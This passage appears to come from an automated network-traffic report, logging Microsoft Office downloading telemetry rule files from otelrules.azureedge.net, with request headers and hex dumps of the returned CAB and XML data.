                                                                                                                                                                                                                            2024-11-06 13:39:15 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                            2024-11-06 13:39:15 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            9192.168.2.54972013.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:18 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:19 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:18 GMT
                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                            Content-Length: 218853
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public
                                                                                                                                                                                                                            Last-Modified: Tue, 05 Nov 2024 17:40:36 GMT
                                                                                                                                                                                                                            ETag: "0x8DCFDC0F4F27BCD"
                                                                                                                                                                                                                            x-ms-request-id: 991f3130-801e-00a0-27ce-2f2196000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133918Z-17df447cdb5vq4m4hC1DFWrbp800000002rg00000000ch6q
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:19 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                            2024-11-06 13:39:19 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                            Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                                            2024-11-06 13:39:19 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                            Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                            2024-11-06 13:39:19 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                            Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                                            2024-11-06 13:39:19 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                            Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                            2024-11-06 13:39:19 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                                            Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                            2024-11-06 13:39:19 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                            Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                            2024-11-06 13:39:19 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                            Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                                            2024-11-06 13:39:19 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                                            2024-11-06 13:39:19 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            10192.168.2.54972313.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:20 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 2980
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                            x-ms-request-id: 67314eae-f01e-005d-4c06-2f13ba000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133920Z-17df447cdb5rrj6shC1DFW6qg400000002q000000000ct99
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            11192.168.2.54972213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:20 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 3788
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                            x-ms-request-id: ece73ca0-101e-007a-073f-2e047e000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133920Z-15869dbbcc6kg5mvhC1DFWgs2s00000001cg00000000b6rv
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            12192.168.2.54972513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:20 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                            x-ms-request-id: 2a69d0a5-301e-000c-194f-2f323f000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133920Z-15869dbbcc6lq45jhC1DFW7zwg000000075g0000000043yc
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            13192.168.2.54972113.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:20 UTC470INHTTP/1.1 200 OK
